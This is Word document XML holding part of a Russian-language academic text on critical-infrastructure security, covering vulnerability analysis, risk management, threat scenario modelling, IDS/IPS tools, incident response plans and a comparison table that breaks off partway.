        <w:t>Анализ уязвимостей — это процесс выявления слабых мест в системе, которые могут быть использованы злоумышленниками. Он включает как автоматизированные средства (например, сканеры уязвимостей), так и ручные методы, такие как анализ лог-файлов, интервью с сотрудниками, а также тестирование на проникновение (</w:t>
      </w:r>
      <w:r>
        <w:t>penetration</w:t>
      </w:r>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>testing</w:t>
      </w:r>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>). Этот процесс помогает не только выявить потенциальные угрозы, но и минимизировать последствия возможных атак. Важно отметить, что уязвимости могут быть как техническими (например, ошибки в коде или неверные настройки системы), так и человеческими (например, недостаток обученности персонала). Регулярное проведение анализа уязвимостей способствует поддержанию системы в актуальном состоянии и предотвращению эксплуатации известных уязвимостей злоумышленниками.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2509B33E" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRDefault="00BF5FF6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BFD0FB" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRPr="008011DB" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2. Управление рисками: основы и принципы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258F9C24" w14:textId="2E1E24AF" w:rsidR="00383137" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Управление рисками — это процесс оценки, анализа и минимизации рисков, связанных с угрозами для критической инфраструктуры. Включает в себя мониторинг угроз, прогнозирование рисков, а также разработку мероприятий по защите системы от возможных атак. Важным аспектом является обеспечение непрерывной работоспособности системы, даже если атакующие смогут преодолеть защиту. Процесс управления рисками требует оценки вероятности возникновения угроз и их воздействия на систему, что помогает приоритетизировать меры безопасности. Например, использование резервных копий, создание планов восстановления и внедрение избыточных систем защиты может значительно снизить риск потери данных и сбоев в работе системы.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55722204" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRPr="00383137" w:rsidRDefault="00BF5FF6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="371A4212" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRPr="008011DB" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4.3. Сценарный анализ угроз: построение вероятных атак</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D624B1" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Сценарный анализ угроз помогает выявить возможные пути атаки на критическую инфраструктуру, включая анализ мотивов и методов злоумышленников. Этот метод позволяет моделировать возможные сценарии вторжения, определять уязвимости и разрабатывать эффективные меры защиты. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1165E6F3" w14:textId="0837697A" w:rsidR="00383137" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Сценарный анализ может быть полезен как для разработки общих стратегий защиты, так и для конкретных ситуаций, например, при проектировании системы безопасности для конкретного объекта. Он дает возможность не только заранее подготовить систему, но и тренировать персонал для быстрого реагирования в случае атаки. Знание возможных атак поможет создавать более устойчивую систему защиты, учитывая разнообразие способов вторжения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D3E4E7" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRPr="00383137" w:rsidRDefault="00BF5FF6" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="737F0134" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRPr="008011DB" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4.4. Инструменты для анализа и предотвращения угроз</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAC6B5C" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для анализа угроз и уязвимостей активно используются различные инструменты, такие как системы обнаружения вторжений (</w:t>
      </w:r>
      <w:r>
        <w:t>IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>), системы предотвращения вторжений (</w:t>
      </w:r>
      <w:r>
        <w:t>IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">), средства мониторинга, а также программное обеспечение для анализа уязвимостей. Эти инструменты помогают оперативно выявить и нейтрализовать угрозы, минимизируя риски для системы. Современные системы могут работать в реальном времени, что значительно повышает уровень безопасности, предоставляя защиту от атак в момент их возникновения. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D59B1E7" w14:textId="425F6B50" w:rsidR="00383137" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Применение таких технологий позволяет не только защитить инфраструктуру, но и своевременно получить информацию о возможных инцидентах, что дает возможность оперативно принять меры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A4B4B3" w14:textId="77777777" w:rsidR="00617AFD" w:rsidRDefault="00617AFD" w:rsidP="00BF5FF6">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2362B80B" w14:textId="1D3B43C2" w:rsidR="00617AFD" w:rsidRDefault="00617AFD" w:rsidP="00617AFD">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:firstLine="284"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="05A32114" wp14:editId="6AAD8741">
            <wp:extent cx="5467350" cy="3272647"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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8989" r="3050" b="6286"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5477803" cy="3278904"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD9F942" w14:textId="07A96E84" w:rsidR="00BF5FF6" w:rsidRPr="00617AFD" w:rsidRDefault="00617AFD" w:rsidP="00520A08">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D557DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>Рис</w:t>
      </w:r>
      <w:r w:rsidR="000262BB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D557DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AFD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00D557DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Схематическое изображение кибератаки по модели Cyber Kill Chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70654BFE" w14:textId="77777777" w:rsidR="00617AFD" w:rsidRPr="00383137" w:rsidRDefault="00617AFD" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1298E897" w14:textId="77777777" w:rsidR="00BF5FF6" w:rsidRPr="008011DB" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008011DB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>4.5. Разработка планов реагирования на угрозы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450A922E" w14:textId="11C673DF" w:rsidR="00383137" w:rsidRDefault="00383137" w:rsidP="00520A08">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00383137">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Планы реагирования на угрозы необходимы для оперативного реагирования на инциденты. Эти планы включают действия, которые должны быть предприняты в случае атаки, а также описание методов защиты, которые должны быть применены для минимизации ущерба. Планы реагирования включают в себя процедуры оповещения, методы изоляции угрозы, а также способы восстановления систем после инцидента. Важно, чтобы такие планы были регулярно тестированы через моделирование атак и обновлялись с учетом новых угроз. Наличие четко прописанных процедур помогает не только предотвратить атаки, но и быстро нейтрализовать последствия, минимизируя ущерб для организации.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE96E03" w14:textId="77777777" w:rsidR="0050626B" w:rsidRDefault="0050626B" w:rsidP="0050626B">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="a6"/>
        <w:tblW w:w="9417" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1980"/>
        <w:gridCol w:w="2410"/>
        <w:gridCol w:w="2126"/>
        <w:gridCol w:w="2901"/>
      </w:tblGrid>
      <w:tr w:rsidR="0050626B" w14:paraId="4A28A36B" w14:textId="77777777" w:rsidTr="00E73156">
        <w:trPr>
          <w:trHeight w:val="361"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="117FF437" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Категория</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74C8972D" w14:textId="77777777" w:rsidR="0050626B" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Сильные стороны</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E5C9833" w14:textId="77777777" w:rsidR="0050626B" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Слабые стороны</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5147CA4C" w14:textId="77777777" w:rsidR="0050626B" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Взаимодополнение</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050626B" w14:paraId="6A65E082" w14:textId="77777777" w:rsidTr="00E73156">
        <w:trPr>
          <w:trHeight w:val="653"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14122999" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Теоретические</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="17D29160" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Универсальность, формализация</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="041FCB99" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Абстрактность, сложность</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52D25724" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>База для проектирования защиты</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050626B" w14:paraId="55904754" w14:textId="77777777" w:rsidTr="00E73156">
        <w:trPr>
          <w:trHeight w:val="731"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6162D2A9" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Эмпирические</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27388BC4" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Практичность, актуальность</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F56A709" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Зависимость от истории атак</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2901" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A52CD06" w14:textId="77777777" w:rsidR="0050626B" w:rsidRPr="00172489" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00172489">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Опора для оперативного реагирования</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0050626B" w14:paraId="15B40481" w14:textId="77777777" w:rsidTr="00E73156">
        <w:trPr>
          <w:trHeight w:val="703"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B0D4DF0" w14:textId="77777777" w:rsidR="0050626B" w:rsidRDefault="0050626B" w:rsidP="00E73156">
            <w:pPr>
              <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:b/>
